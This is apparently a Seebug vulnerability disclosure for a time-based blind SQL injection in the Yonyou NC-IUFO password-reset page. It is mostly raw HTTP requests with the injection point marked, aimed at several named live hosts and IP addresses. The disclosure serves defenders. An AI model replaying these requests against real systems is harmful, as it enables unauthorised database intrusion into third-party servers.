Yonyou (用友) NC-IUFO system generic SQL injection (part 3)

2015-01-13T00:00:00
ID SSV:93318
Type seebug
Reporter Root
Modified 2015-01-13T00:00:00

Description

Brief description:

...

Details:

The "Forgot password" module of this system has a SQL injection vulnerability. The page is at: /epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234

[Screenshot: https://images.seebug.org/upload/201501/10164647850329b74ce2a803fc0de1dd767da668.png]

Note: after a username and e-mail address are entered and the form is submitted, the page POSTs to /epp/core (visible in the captured request). Vulnerable parameter: userid. Database: Oracle. Injection type: AND/OR time-based blind. Proof cases follow (listing the database instance name is sufficient; no deeper extraction was done):

0x01: http://nc.xhlbdc.com/epp/

POST /epp/core HTTP/1.1
Host: nc.xhlbdc.com
Proxy-Connection: keep-alive
Content-Length: 107
Origin: http://nc.xhlbdc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Referer: http://nc.xhlbdc.com/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=8438
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: JSESSIONID=0000zdbG9i3ttIPJ7g2Ayl4KoRm:175j517sp

userid=*&email=&type=forgetPWD&pageId=forgetpwd&pageUniqueId=177ef747-d34f-4076-b627-bf97720fbbdf&isAjax=1

[Screenshot: https://images.seebug.org/upload/201501/10165621d9c4cb2ce4c8e58c932a8d0a2b7607fb.jpg]

0x02: http://nc.pinggugroup.com:81/epp/

POST /epp/core HTTP/1.1
Host: nc.pinggugroup.com:81
Proxy-Connection: keep-alive
Content-Length: 111
Origin: http://nc.pinggugroup.com:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Referer: http://nc.pinggugroup.com:81/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=7158
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: JSESSIONID=0000ZPRlAAMZqeOX2_DUd6dPukK:-1

userid=*&email=aaaaa&type=forgetPWD&pageId=forgetpwd&pageUniqueId=ef251f23-ae34-4047-95f0-2f95f3085cf2&isAjax=1

[Screenshot: https://images.seebug.org/upload/201501/101651300cd5259af6212d618c309048dacc85ad.jpg]

0x03: http://123.232.105.202/epp/

POST /epp/core HTTP/1.1
Host: 123.232.105.202
Proxy-Connection: keep-alive
Content-Length: 111
Origin: http://123.232.105.202
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Referer: http://123.232.105.202/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=4522
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: JSESSIONID=0000FoJ4EiDJNB9px4Q_Y3g01j9:-1

userid=*&email=aaaaa&type=forgetPWD&pageId=forgetpwd&pageUniqueId=a4004558-4d36-4b1e-a397-6b8217320613&isAjax=1

[Screenshot: https://images.seebug.org/upload/201501/101719046d6d5130e7343471cb3ca73c2534f71f.jpg]

0x04: http://zfkg.com:8081/epp/

POST /epp/core HTTP/1.1
Host: zfkg.com:8081
Proxy-Connection: keep-alive
Content-Length: 110
Origin: http://zfkg.com:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Referer: http://zfkg.com:8081/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: JSESSIONID=843FB4AB3D3B82DDDC089308B9A97A23.server; JSESSIONID=9F6DE9B77CB36498D032BE46B92A6C54.server

userid=*&email=aaaa&type=forgetPWD&pageUniqueId=78c7cfa2-6909-4ee5-b72b-3098364a5369&pageId=forgetpwd&isAjax=1

[Screenshot: https://images.seebug.org/upload/201501/10171737aa5093ace895dbdc1c9f44687ef8eb2f.jpg]

http://202.136.213.21/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234
http://61.175.97.50//epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234

Proof of vulnerability: